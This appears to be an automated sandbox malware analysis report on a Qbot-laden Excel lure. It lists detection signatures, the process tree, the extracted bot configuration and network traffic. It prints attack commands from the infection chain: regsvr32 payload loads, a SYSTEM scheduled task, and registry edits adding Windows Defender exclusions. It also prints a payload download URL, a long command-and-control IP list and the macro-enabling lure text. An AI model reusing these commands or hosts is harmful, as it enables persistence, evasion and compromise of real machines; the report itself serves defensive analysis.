Play interactive tour

Edit tour

Windows Analysis Report Rebate-690835286-10052021.xls

Overview

General Information

Sample Name:	Rebate-690835286-10052021.xls
Analysis ID:	497532
MD5:	1513c88677fc7fa1994a59197ebdb528
SHA1:	b4b9486e65b90c10c2e0bd1c3617771ccec0a335
SHA256:	7eaf061ea660be58767918cb80fb98da9c348be2b2449836bf840cfbf12882ec
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Qbot

Document exploit detected (drops PE files)

Sigma detected: Schedule system process

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus detection for URL or domain

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Office process drops PE file

Writes to foreign memory regions

Uses cmd line tools excessively to alter registry or file data

Sigma detected: Microsoft Office Product Spawning Windows Shell

Allocates memory in foreign processes

Injects code into the Windows Explorer (explorer.exe)

Sigma detected: Regsvr32 Command Line Without DLL

Drops PE files to the user root directory

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Yara detected hidden Macro 4.0 in Excel

Uses schtasks.exe or at.exe to add and modify task schedules

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Abnormal high CPU Usage

Drops files with a non-matching file extension (content does not match file extension)

PE file does not import any functions

Potential document exploit detected (unknown TCP traffic)

PE file contains an invalid checksum

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Uses reg.exe to modify the Windows registry

Document contains embedded VBA macros

Drops PE files to the user directory

PE file overlay found

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3068 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

regsvr32.exe (PID: 1892 cmdline: regsvr32 -silent ..\Celod.wac MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 1988 cmdline: regsvr32 -silent ..\Celod.wac1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2988 cmdline: regsvr32 -silent ..\Celod.wac2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 3024 cmdline: -silent ..\Celod.wac2 MD5: 432BE6CF7311062633459EEF6B242FB5)

explorer.exe (PID: 2556 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

schtasks.exe (PID: 1172 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

regsvr32.exe (PID: 2568 cmdline: regsvr32.exe -s 'C:\Users\user\Celod.wac2' MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2956 cmdline: -s 'C:\Users\user\Celod.wac2' MD5: 432BE6CF7311062633459EEF6B242FB5)

explorer.exe (PID: 2300 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

reg.exe (PID: 2288 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)

reg.exe (PID: 1968 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)

regsvr32.exe (PID: 2904 cmdline: regsvr32.exe -s 'C:\Users\user\Celod.wac2' MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2936 cmdline: -s 'C:\Users\user\Celod.wac2' MD5: 432BE6CF7311062633459EEF6B242FB5)

cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama109", "Campaign": "1633422349", "Version": "402.363", "C2 list": ["202.134.178.157:443", "187.116.124.82:995", "73.130.180.25:443", "73.52.50.32:443", "120.151.47.189:443", "181.118.183.94:443", "122.11.220.212:2222", "103.142.10.177:443", "202.165.32.158:2222", "70.37.217.196:443", "78.191.36.142:995", "167.248.100.227:443", "103.148.120.144:443", "89.101.97.139:443", "75.75.179.226:443", "120.150.218.241:995", "185.250.148.74:443", "72.196.22.184:0", "81.241.252.59:2078", "140.82.49.12:443", "136.232.34.70:443", "39.52.197.237:995", "167.248.117.81:443", "81.250.153.227:2222", "69.30.186.190:443", "73.230.205.91:443", "89.137.52.44:443", "74.72.237.54:443", "96.57.188.174:2078", "37.210.152.224:995", "94.200.181.154:443", "217.17.56.163:2222", "217.17.56.163:2078", "41.228.22.180:443", "115.96.53.68:443", "124.123.42.115:2222", "38.10.197.234:443", "75.66.88.33:443", "173.21.10.71:2222", "73.151.236.31:443", "202.165.32.158:2222", "47.22.148.6:443", "173.25.162.221:443", "71.74.12.34:443", "75.188.35.168:443", "206.47.134.234:2222", "216.201.162.158:443", "67.165.206.193:993", "45.46.53.140:2222", "76.25.142.196:443", "167.248.23.224:443", "47.40.196.233:2222", "177.94.21.110:995", "208.89.170.179:443", "167.248.54.34:2222", "86.8.177.143:443", "181.4.53.6:465", "167.248.99.149:443", "201.93.111.2:995", "24.55.112.61:443", "73.77.87.137:443", "109.12.111.14:443", "181.4.53.6:443", "40.131.140.155:995", "190.198.206.189:2222", "167.248.111.245:443", "96.46.103.226:443", "73.25.124.140:2222", "24.152.219.253:995", "72.252.201.69:443", "68.186.192.69:443", "24.229.150.54:995", "173.25.166.81:443", "174.54.58.170:443", "103.246.130.114:1194", "103.246.130.35:21", "103.246.130.2:20", "103.246.130.122:20", "2.99.100.134:2222", "105.198.236.99:443", "103.157.122.198:995", "4.34.193.180:995", "24.119.214.7:443", "159.2.51.200:2222", "110.174.64.179:995", "187.101.25.96:32100", "174.54.193.186:443", "76.84.230.103:443", "174.59.35.191:443", "173.63.245.129:443", "24.139.72.117:443", "68.117.229.117:443", "75.163.81.130:995", "76.84.32.159:443", "147.92.51.49:443", "68.204.7.158:443", "76.84.226.17:443", "68.13.157.69:443", "167.248.126.223:443", "72.196.22.184:443", "98.22.92.139:995", "209.50.20.255:443", "97.98.130.50:443", "196.117.106.38:995", "77.57.204.78:443", "191.191.38.8:443", "176.251.215.116:443", "96.46.103.109:2222", "188.210.210.122:443", "37.117.191.19:2222", "188.210.210.122:443", "197.90.137.161:61201", "24.32.174.175:443", "76.84.225.21:443", "188.210.210.122:443", "78.145.153.73:995", "69.30.190.105:995", "167.248.81.60:443", "69.80.113.148:443", "217.17.56.163:443", "62.23.194.38:443", "62.23.194.41:995", "199.27.127.129:443", "189.210.115.207:443", "174.59.226.6:443", "73.130.237.36:443", "69.253.197.100:443", "174.59.242.9:443", "177.130.82.197:2222", "67.214.30.12:995", "174.59.120.69:443", "47.181.84.61:443", "73.130.239.166:443", "217.165.163.21:995", "93.8.66.216:443", "73.52.114.202:443", "186.18.205.199:995", "38.10.202.214:443", "78.191.44.76:443", "96.83.180.29:443", "124.123.42.115:2078", "105.159.144.186:995", "27.223.92.142:995", "109.190.253.11:2222", "217.17.56.163:465", "38.10.201.211:443", "92.148.59.207:2222", "92.157.171.41:2222", "217.17.56.163:443", "217.17.56.163:443"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Rebate-690835286-10052021.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000008.00000003.642150052.00000000004C0000.00000040.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
0000000D.00000003.719512472.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security

Unpacked PEs

Source	Rule	Description	Author
9.2.explorer.exe.e0000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
9.2.explorer.exe.e0000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
13.3.regsvr32.exe.1b339c.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
8.2.regsvr32.exe.6cb00000.6.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
13.2.regsvr32.exe.6cb00000.6.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
8.3.regsvr32.exe.4d339c.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
8.3.regsvr32.exe.4d339c.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
14.2.explorer.exe.80000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
14.2.explorer.exe.80000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
13.3.regsvr32.exe.1b339c.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Celod.wac, CommandLine: regsvr32 -silent ..\Celod.wac, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3068, ProcessCommandLine: regsvr32 -silent ..\Celod.wac, ProcessId: 1892

Sigma detected: Regsvr32 Command Line Without DLL

Show sources

Source: Process started

Author: Florian Roth: Data: Command: -silent ..\Celod.wac2, CommandLine: -silent ..\Celod.wac2, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Celod.wac2, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2988, ProcessCommandLine: -silent ..\Celod.wac2, ProcessId: 3024

Persistence and Installation Behavior:

Sigma detected: Schedule system process

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2556, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32, ProcessId: 1172

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 9.2.explorer.exe.e0000.0.unpack

Malware Configuration Extractor: Qbot {"Bot id": "obama109", "Campaign": "1633422349", "Version": "402.363", "C2 list": ["202.134.178.157:443", "187.116.124.82:995", "73.130.180.25:443", "73.52.50.32:443", "120.151.47.189:443", "181.118.183.94:443", "122.11.220.212:2222", "103.142.10.177:443", "202.165.32.158:2222", "70.37.217.196:443", "78.191.36.142:995", "167.248.100.227:443", "103.148.120.144:443", "89.101.97.139:443", "75.75.179.226:443", "120.150.218.241:995", "185.250.148.74:443", "72.196.22.184:0", "81.241.252.59:2078", "140.82.49.12:443", "136.232.34.70:443", "39.52.197.237:995", "167.248.117.81:443", "81.250.153.227:2222", "69.30.186.190:443", "73.230.205.91:443", "89.137.52.44:443", "74.72.237.54:443", "96.57.188.174:2078", "37.210.152.224:995", "94.200.181.154:443", "217.17.56.163:2222", "217.17.56.163:2078", "41.228.22.180:443", "115.96.53.68:443", "124.123.42.115:2222", "38.10.197.234:443", "75.66.88.33:443", "173.21.10.71:2222", "73.151.236.31:443", "202.165.32.158:2222", "47.22.148.6:443", "173.25.162.221:443", "71.74.12.34:443", "75.188.35.168:443", "206.47.134.234:2222", "216.201.162.158:443", "67.165.206.193:993", "45.46.53.140:2222", "76.25.142.196:443", "167.248.23.224:443", "47.40.196.233:2222", "177.94.21.110:995", "208.89.170.179:443", "167.248.54.34:2222", "86.8.177.143:443", "181.4.53.6:465", "167.248.99.149:443", "201.93.111.2:995", "24.55.112.61:443", "73.77.87.137:443", "109.12.111.14:443", "181.4.53.6:443", "40.131.140.155:995", "190.198.206.189:2222", "167.248.111.245:443", "96.46.103.226:443", "73.25.124.140:2222", "24.152.219.253:995", "72.252.201.69:443", "68.186.192.69:443", "24.229.150.54:995", "173.25.166.81:443", "174.54.58.170:443", "103.246.130.114:1194", "103.246.130.35:21", "103.246.130.2:20", "103.246.130.122:20", "2.99.100.134:2222", "105.198.236.99:443", "103.157.122.198:995", "4.34.193.180:995", "24.119.214.7:443", "159.2.51.200:2222", "110.174.64.179:995", "187.101.25.96:32100", "174.54.193.186:443", "76.84.230.103:443", "174.59.35.191:443", "173.63.245.129:443", "24.139.72.117:443", "68.117.229.117:443", "75.163.81.130:995", "76.84.32.159:443", "147.92.51.49:443", "68.204.7.158:443", "76.84.226.17:443", "68.13.157.69:443", "167.248.126.223:443", "72.196.22.184:443", "98.22.92.139:995", "209.50.20.255:443", "97.98.130.50:443", "196.117.106.38:995", "77.57.204.78:443", "191.191.38.8:443", "176.251.215.116:443", "96.46.103.109:2222", "188.210.210.122:443", "37.117.191.19:2222", "188.210.210.122:443", "197.90.137.161:61201", "24.32.174.175:443", "76.84.225.21:443", "188.210.210.122:443", "78.145.153.73:995", "69.30.190.105:995", "167.248.81.60:443", "69.80.113.148:443", "217.17.56.163:443", "62.23.194.38:443", "62.23.194.41:995", "199.27.127.129:443", "189.210.115.207:443", "174.59.226.6:443", "73.130.237.36:443", "69.253.197.100:443", "174.59.242.9:443", "177.130.82.197:2222", "67.214.30.12:995", "174.59.120.69:443", "47.181.84.61:443", "73.130.239.166:443", "217.165.163.21:995", "93.8.66.216:443", "73.52.114.202:443", "186.18.205.199

Antivirus detection for URL or domain

Show sources

Source: http://101.99.90.118/44474.9279916667.dat

Avira URL Cloud: Label: phishing

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: c:\level\match\lift_Fit\set\Nation\Heat.pdb source: regsvr32.exe, 00000008.00000002.646420576.000000006CB42000.00000002.00020000.sdmp, explorer.exe, 00000009.00000003.646985681.0000000002760000.00000004.00000001.sdmp, regsvr32.exe, 0000000D.00000002.723731467.000000006CB42000.00000002.00020000.sdmp
Source:	Binary string: amstream.pdb source: explorer.exe, 00000009.00000003.646641483.0000000002760000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000003.723947721.00000000015F0000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB0AEF6 FindFirstFileW,FindNextFileW,	8_2_6CB0AEF6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000EAEF6 FindFirstFileW,FindNextFileW,	9_2_000EAEF6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0008AEF6 FindFirstFileW,FindNextFileW,	14_2_0008AEF6

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: 44474.9279916667[1].dat.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.36.191.21:80

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 101.99.90.118:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Oct 2021 20:18:03 GMTContent-Type: application/octet-streamContent-Length: 1079808Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44474.9279916667.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 21 b1 75 9e 40 df 26 9e 40 df 26 9e 40 df 26 2d dc 3e 26 a1 40 df 26 2d dc 3f 26 9f 40 df 26 2a dc 2d 26 95 40 df 26 2a dc 2d 26 86 40 df 26 9e 40 de 26 4c 40 df 26 2a dc 2f 26 97 40 df 26 2a dc 2c 26 99 40 df 26 2a dc 30 26 9f 40 df 26 2a dc 28 26 0c 40 df 26 2a dc 31 26 9f 40 df 26 2a dc 2e 26 9f 40 df 26 52 69 63 68 9e 40 df 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 19 cc 90 5d 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 0a 00 0e 04 00 00 12 9d 00 00 00 00 00 f1 54 00 00 00 10 00 00 00 20 04 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 a1 00 00 04 00 00 64 c3 10 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4e 10 00 a8 00 00 00 48 4f 10 00 50 00 00 00 00 20 a1 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 a1 00 3c 1c 00 00 a0 3b 10 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 3b 10 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 04 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 de 0c 04 00 00 10 00 00 00 0e 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 37 0c 00 00 20 04 00 00 38 0c 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 b4 90 00 00 60 10 00 00 0c 00 00 00 4a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 04 00 00 00 20 a1 00 00 06 00 00 00 56 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 1c 00 00 00 30 a1 00 00 1e 00 00 00 5c 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /44474.9279916667.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 101.99.90.118Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown	TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown	TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown	TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown	TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown	TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown	TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown	TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown	TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown	TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown	TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown	TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.90.118

Source: regsvr32.exe, 00000008.00000002.645961508.0000000002620000.00000002.00020000.sdmp, explorer.exe, 00000009.00000002.906949180.0000000001F10000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.723204215.0000000000DA0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.906929427.0000000000F70000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.594742750.0000000001CB0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.595494652.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.646970896.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.645612767.0000000002320000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.724170254.00000000008F0000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.722812935.0000000000890000.00000002.00020000.sdmp, reg.exe, 0000000F.00000002.726341911.0000000000830000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000008.00000002.645961508.0000000002620000.00000002.00020000.sdmp, explorer.exe, 00000009.00000002.906949180.0000000001F10000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.723204215.0000000000DA0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.906929427.0000000000F70000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat

Jump to behavior

Source: global traffic

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 21 example of notification 22 23 ( 0 Thlsfi\|eor
Source: Screenshot number: 4	Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Document image extraction number: 0	Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0	Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1	Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1	Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Celod.wac2

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB15000	8_2_6CB15000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB16EF0	8_2_6CB16EF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB11790	8_2_6CB11790
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB1237E	8_2_6CB1237E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000F5000	9_2_000F5000
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000F6EF0	9_2_000F6EF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000F237E	9_2_000F237E
